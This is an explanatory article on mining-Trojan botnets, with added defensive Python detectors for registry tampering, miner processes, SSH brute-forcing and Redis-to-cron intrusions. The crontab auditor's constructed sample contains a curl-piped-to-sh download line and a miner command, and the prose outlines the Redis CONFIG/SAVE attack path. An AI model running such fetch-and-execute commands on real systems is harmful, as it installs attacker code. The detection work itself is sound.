What is a mining Trojan?
A mining Trojan is a cryptocurrency-mining program implanted on a computer and run without the owner's knowledge. The first mining Trojans appeared in 2013; reported mining Trojan attacks grew explosively in 2017.
Monero is the coin that mining Trojans favour most, and more and more of them target it, for the following reasons:
- Monero holds its value. Although it cannot rival Bitcoin in price, its price is still high enough to make mining worthwhile.
- Monero is a privacy coin. A privacy coin is a blockchain token that hides the amount, the sender and the receiver of every transaction, so no one can trace either party's address or the amount in a blockchain explorer. This makes it far easier for attackers to move and cash out the mined Monero without being traced.
- Monero uses the CryptoNight proof-of-work algorithm, which is designed to be mined efficiently on ordinary CPUs and GPUs without specialised ASIC hardware, so every infected PC or server is a usable miner. (Monero replaced CryptoNight with RandomX, which is likewise CPU-oriented, in November 2019; the point still holds.)
- Many mature open-source Monero miners (XMRig being the best known) are freely available, so attackers can reuse them at any time instead of writing their own.
- Monero is widely accepted in underground markets.
In a recent news report, servers at several large hospitals in China were compromised. The attackers brute-forced the servers' remote login service, then downloaded a batch of mining Trojans from file-sharing services hosted at several cloud providers.
The attackers disguised the mining Trojan as the remote-assistance tool TeamViewer. Once running, it compared the process list against a built-in list of up to 50 common mining programs, terminated any it found, and took all of the machine's resources for itself.
The Trojan also weakened the operating system's defences through the registry: it disabled UAC (User Account Control), disabled Windows Defender, and switched off the warning shown before running programs downloaded from the internet.
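The registry tampering described above leaves fingerprints that are cheap to check. The following is an added example, not code from the article or from the samples it describes: it reads the usual values behind "disable UAC", "disable Defender" and "no download warning" and reports any that sit at the tampered setting. Which exact values the real samples touched is not stated in the report, so the list of keys is an assumption based on the standard policy locations; the two snapshots at the bottom are constructed, not taken from a real host.

```python
"""Check the registry settings a mining Trojan is described as tampering with.

Added example, not code from the article or from any sample it describes.
On Windows, collect() reads the live registry through winreg; evaluate() is a
pure function so it can also run over a snapshot exported from another host.
"""
import sys

# (hive, key path, value name, value that indicates tampering, description).
# Which exact values the samples touched is an assumption: these are the usual
# policy locations for "disable UAC", "disable Defender" and "no download warning".
CHECKS = [
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "EnableLUA", 0, "UAC disabled"),
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "ConsentPromptBehaviorAdmin", 0, "UAC elevates administrators without prompting"),
    ("HKLM", r"SOFTWARE\Policies\Microsoft\Windows Defender",
     "DisableAntiSpyware", 1, "Windows Defender disabled by policy"),
    ("HKLM", r"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection",
     "DisableRealtimeMonitoring", 1, "Defender real-time protection disabled"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Policies\Attachments",
     "SaveZoneInformation", 1, "zone information dropped from downloads, so no 'unknown publisher' warning"),
]


def collect(checks=CHECKS):
    """Read every checked value from the live registry (Windows only)."""
    import winreg  # ImportError on other platforms
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snapshot = {}
    for hive, path, name, _bad, _why in checks:
        try:
            with winreg.OpenKey(hives[hive], path) as key:
                value, _kind = winreg.QueryValueEx(key, name)
        except OSError:
            continue  # key or value absent: the secure default applies
        snapshot[(hive, path, name)] = value
    return snapshot


def evaluate(snapshot, checks=CHECKS):
    """Return one finding string per check whose value matches the tampered value."""
    findings = []
    for hive, path, name, bad, why in checks:
        if snapshot.get((hive, path, name)) == bad:
            findings.append(f"{hive}\\{path}\\{name} = {bad}: {why}")
    return findings


# Constructed snapshots (not taken from any real host): one resembling a machine
# after the tampering described in the report, one with UAC left enabled.
TAMPERED = {
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA"): 0,
    ("HKLM", r"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware"): 1,
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Policies\Attachments", "SaveZoneInformation"): 1,
}
CLEAN = {
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA"): 1,
}

if __name__ == "__main__":
    snapshot = collect() if sys.platform == "win32" else TAMPERED
    for finding in evaluate(snapshot):
        print(finding)
```

Run it on the affected host; an absent key is treated as the secure default, so only values that were actually set to the weakened setting are reported.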
According to analysis of known samples, the attackers' mining Trojans used several mining pools, and the mined coins included Monero (XMR), Ethereum (ETH) and Zcash (ZEC). Pool statistics showed that the attackers had earned more than 58,000 US dollars.
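The Trojan in this case carried a list of miner process names so it could kill its competitors, and it identified itself to the pools by wallet address. A defender can turn both facts around: match process names against a miner list, and match command lines for stratum pool URLs and wallet addresses, so a miner renamed to look like TeamViewer is still caught. The block below is an added example, not code from the article or from the samples it describes. The miner names, hosts and command lines are constructed, and the wallet strings are synthetic values of the right shape, not real addresses.

```python
"""Flag miner processes from their command lines.

Added example, not code from the article or from the samples it describes.
Matches the executable name against known miners, and the whole command line
against stratum pool URLs and XMR/ETH/ZEC wallet address patterns. All command
lines and wallet strings below are constructed.
"""
import re

KNOWN_MINERS = {"xmrig", "xmr-stak", "minerd", "cpuminer", "ethminer",
                "claymore", "nheqminer", "ccminer", "cgminer"}

POOL_RE = re.compile(r"stratum\+(?:tcp|ssl)://([A-Za-z0-9.-]+):(\d{2,5})")
# Monero standard (4...) and subaddress (8...) are 95 base58 characters;
# Ethereum is 0x + 40 hex; Zcash transparent addresses are t1 + 33 base58.
WALLET_RES = {
    "XMR": re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b"),
    "ETH": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "ZEC": re.compile(r"\bt1[1-9A-HJ-NP-Za-km-z]{33}\b"),
}


def exe_name(cmdline):
    """Lower-case basename of the first token, without a trailing .exe."""
    first = cmdline.split()[0]
    base = re.split(r"[\\/]", first)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def classify(cmdline):
    """Return the indicators found in one command line, or None if nothing matched."""
    hits = {}
    name = exe_name(cmdline)
    if name in KNOWN_MINERS:
        hits["known_miner"] = name
    pools = [f"{host}:{port}" for host, port in POOL_RE.findall(cmdline)]
    if pools:
        hits["pools"] = pools
    wallets = [(coin, addr) for coin, rx in WALLET_RES.items() for addr in rx.findall(cmdline)]
    if wallets:
        hits["wallets"] = wallets
    return hits or None


# Synthetic wallet strings of the right shape and length (not real addresses).
XMR_ADDR = "4" + "5Y" * 47          # 95 chars
ETH_ADDR = "0x" + "ab12" * 10       # 42 chars
ZEC_ADDR = "t1" + "Zk" * 16 + "Q"   # 35 chars

SAMPLES = [
    # miner renamed to look like TeamViewer: the name list misses it, the pool and wallet do not
    r"C:\ProgramData\TeamViewer\TeamViewer.exe -o stratum+tcp://pool.example.test:3333 -u "
    + XMR_ADDR + " -p x",
    "/tmp/.x/xmrig --url=stratum+ssl://pool.example.test:443 --user=" + XMR_ADDR,
    "ethminer -o stratum+tcp://eth.example.test:4444 -u " + ETH_ADDR,
    "nheqminer -l zec.example.test:3357 -u " + ZEC_ADDR + ".rig1",
    "/usr/bin/teamviewerd -d",                    # the real daemon: clean
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(classify(cmd) or "clean", "<-", cmd[:60])
```

The first sample is the interesting one: its executable name is not on the list, but the stratum URL and the 95-character Monero address give it away. Feed the function the output of `ps -eo args` or `Get-CimInstance Win32_Process` to run it over a live system.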
As many as 50% of medical institutions in China expose a remote login service (the report cites port 22) to the internet, which means that half of their servers could suffer the same kind of attack.
How is a mining Trojan botnet built?
Building a mining Trojan botnet generally takes three steps.
I. Establishment of Botnet
Whether the botnet can scale depends largely on how it is first established. To take control of many computers the attacker needs a weapon capable of large-scale intrusion, and that weapon is an exploit for an operating system vulnerability.
In April 2017 the Shadow Brokers published a set of NSA exploits, among them “EternalBlue”, which attacks a vulnerability in Windows SMBv1 that Microsoft had patched in March 2017 as MS17-010. The “WannaCry” ransomware that caused unprecedented damage in May 2017 spread through EternalBlue, and most of the mining Trojan botnets that broke out in the first half of 2017 also relied on it for their initial foothold.
“EternalBlue” has two advantages that most exploits lack:
- No user interaction. Unlike “passive” attacks delivered through browser or office-suite vulnerabilities, which need the victim to open a page or a document, EternalBlue is an “active” attack: the attacker simply sends exploit packets to the target.
- A wide range of targets. Any machine with TCP port 445 reachable and the MS17-010 patch missing can be compromised, and attackers can scan the whole internet for such hosts. EternalBlue therefore became standard equipment for mining Trojan botnets.
As more details of the vulnerability were published, many EternalBlue implementations appeared. The “mateMiner” botnet, which emerged in September 2017 and grew quickly, integrated an EternalBlue exploit written in PowerShell.
II. Expansion of Botnets
Once the botnet has taken shape, the attacker uses the existing infected machines (bots) to attack more computers, because profit scales with the number of miners. Every bot in the botnet becomes an attacker in its own right, and its targets are all the computers on the internet.
Exploits still play a major part in expansion. After a certain number of bots are under control, the attacker has them attack further computers. Because there are so many bots, they can scan for and exploit vulnerable hosts far faster than the attacker's own machines could, which lets the botnet grow rapidly.
Port scanning and password cracking also drive expansion. The “Anonymous” botnet, for example, carries an internet-wide scanning module that continuously probes a specific port on random IP addresses; when the port is open, it attempts to brute-force the credentials and log in to the target.
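Seen from the target, the scan-and-crack behaviour just described is a burst of failed logins from one source address, sometimes followed by a success, and that is easy to pick out of an authentication log. The block below is an added example, not code from the article: it parses sshd lines in syslog format, applies a sliding time window per source IP, and reports sources that exceed a failure threshold together with any login accepted after the burst. The log lines are constructed; since syslog lines carry no year, one is assumed.

```python
"""Spot the scan-and-crack pattern in SSH authentication logs.

Added example, not code from the article. Groups sshd failures by source IP,
flags any source with >= threshold failures inside a sliding window, and
reports logins that were accepted from that source after the burst began.
The log lines are constructed; the year is assumed because syslog omits it.
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) (?:password|publickey) for (?:invalid user )?(\S+) "
    r"from (\d+\.\d+\.\d+\.\d+)"
)


def parse(line, year=2018):
    """Return (timestamp, outcome, username, source_ip) or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Map each source IP that produced >= threshold failures inside any
    window_seconds-long window to a summary of the attempt."""
    by_ip = defaultdict(list)
    for line in lines:
        parsed = parse(line)
        if parsed:
            ts, outcome, user, ip = parsed
            by_ip[ip].append((ts, outcome, user))

    report = {}
    for ip, events in by_ip.items():
        events.sort()
        fails = [(ts, user) for ts, outcome, user in events if outcome == "Failed"]
        # sliding window over the failure timestamps
        start, burst = 0, False
        for end in range(len(fails)):
            while (fails[end][0] - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        first_fail = fails[0][0]
        cracked = [user for ts, outcome, user in events
                   if outcome == "Accepted" and ts >= first_fail]
        report[ip] = {
            "failures": len(fails),
            "usernames_tried": sorted({user for _, user in fails}),
            "accepted_after_failures": cracked,
        }
    return report


# Constructed log lines: one source hammering root/admin and getting in,
# one user mistyping a password twice, and an unrelated line.
SAMPLE_LOG = [
    "Jan 12 03:14:01 srv01 sshd[2412]: Failed password for root from 203.0.113.7 port 50122 ssh2",
    "Jan 12 03:14:03 srv01 sshd[2414]: Failed password for invalid user admin from 203.0.113.7 port 50124 ssh2",
    "Jan 12 03:14:05 srv01 sshd[2416]: Failed password for root from 203.0.113.7 port 50126 ssh2",
    "Jan 12 03:14:07 srv01 sshd[2418]: Failed password for invalid user oracle from 203.0.113.7 port 50128 ssh2",
    "Jan 12 03:14:09 srv01 sshd[2420]: Failed password for root from 203.0.113.7 port 50130 ssh2",
    "Jan 12 03:14:11 srv01 sshd[2422]: Failed password for root from 203.0.113.7 port 50132 ssh2",
    "Jan 12 03:14:20 srv01 sshd[2430]: Accepted password for root from 203.0.113.7 port 50140 ssh2",
    "Jan 12 03:15:02 srv01 sshd[2440]: Connection closed by 203.0.113.7 port 50140 [preauth]",
    "Jan 12 08:01:10 srv01 sshd[3001]: Failed password for alice from 198.51.100.3 port 40010 ssh2",
    "Jan 12 08:01:15 srv01 sshd[3001]: Failed password for alice from 198.51.100.3 port 40010 ssh2",
    "Jan 12 08:01:22 srv01 sshd[3001]: Accepted publickey for alice from 198.51.100.3 port 40010 ssh2",
]

if __name__ == "__main__":
    for ip, summary in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, summary)
```

An accepted password login from a source that has just failed several times is the line to act on first: it marks the bot that got in and will now start scanning from your address space.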
III. Persistence of the Botnet
Whether the attacker keeps control of a bot depends on whether the bot program can stay resident on it, so mining Trojan botnets use every available means to persist on infected machines.
The attackers' preferred method is to inject the bot directly into a system process. Each compromised computer then carries both the mining Trojan and the bot code that drives further expansion.
The most common attacks of this kind, such as servers compromised through exposed Redis or MySQL instances with weak or missing authentication, all aim to turn the server into a mining machine.
The process runs as follows: scan for the service's default port; if the service has no password, it is trivially accessible, and if it does have one, it may still be brute-forced. Then create scheduled tasks (cron jobs), implant the Trojan and start mining.
The attacker uses the compromised computer not only to mine but also to search for other servers, so the mining Trojan quickly spreads across the whole network and a complete mining Trojan botnet is established.
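The procedure above has a well-known concrete form on Linux: an internet-exposed Redis with no password accepts CONFIG SET dir and CONFIG SET dbfilename, and a following SAVE writes the dataset, which the attacker has seeded with a crontab line, into /var/spool/cron. The block below is an added example, not code from the article; it audits both ends of that chain, the Redis settings that make it possible (a weak configuration beside a hardened one) and the crontab entries it leaves behind. Both configurations and the crontab are constructed, and the pool and download hosts are placeholders.

```python
"""Audit the two ends of the Redis-to-cron intrusion described above.

Added example, not code from the article. redis_config_findings() flags the
settings that let an anonymous client rewrite dir/dbfilename and SAVE into
/var/spool/cron; cron_findings() looks for the crontab entries that result.
Both configs and the crontab lines are constructed.
"""
import re

WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
"""


def parse_redis_conf(text):
    """redis.conf is 'directive value...' per line; directives may repeat."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def redis_config_findings(text):
    """Return the weaknesses that make the dir/dbfilename/SAVE trick possible."""
    conf = parse_redis_conf(text)
    findings = []
    bound = [addr for value in conf.get("bind", []) for addr in value.split()]
    if not bound or any(addr in ("0.0.0.0", "*", "::") for addr in bound):
        findings.append("bind: Redis listens on all interfaces")
    if conf.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients are accepted")
    if "requirepass" not in conf:
        findings.append("requirepass unset: no password at all")
    renamed = {value.split()[0].upper() for value in conf.get("rename-command", []) if value.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed: dir and dbfilename can be pointed at /var/spool/cron")
    return findings


CRON_INDICATORS = [
    (re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"), "download piped straight into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-encoded payload decoded at run time"),
    (re.compile(r"stratum\+(tcp|ssl)://"), "mining pool URL"),
    (re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S*"), "program run from a world-writable directory"),
    (re.compile(r"REDIS\d{4}"), "RDB header: this crontab was written by a Redis SAVE"),
]


def cron_findings(lines):
    """Return (line number, reason) for every crontab line matching an indicator."""
    out = []
    for number, line in enumerate(lines, 1):
        for rx, reason in CRON_INDICATORS:
            if rx.search(line):
                out.append((number, reason))
    return out


# Constructed crontab as left behind by the intrusion, plus one legitimate job.
SAMPLE_CRONTAB = [
    "REDIS0008\xfa\tredis-ver\x054.0.9",
    "*/10 * * * * curl -fsSL http://198.51.100.77/i.sh | sh",
    "* * * * * /tmp/.X11-unix/.rsync/xmrig -o stratum+tcp://pool.example.test:3333 -u 4xxxx",
    "0 4 * * * /usr/bin/certbot renew --quiet",
]

if __name__ == "__main__":
    print("weak:", redis_config_findings(WEAK_CONF))
    print("hardened:", redis_config_findings(HARDENED_CONF))
    for number, reason in cron_findings(SAMPLE_CRONTAB):
        print(f"line {number}: {reason}")
```

The RDB header check is the tell-tale: cron ignores the binary junk around the injected line, so a crontab that starts with REDIS followed by a version number was written by a database, not by an administrator. Point redis_config_findings at /etc/redis/redis.conf and cron_findings at the files under /var/spool/cron and /etc/cron.d.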
With that overview, you should have a clear picture of how a mining Trojan botnet works. Finally, we hope everyone pays attention to the security of their computers and miners. Happy mining.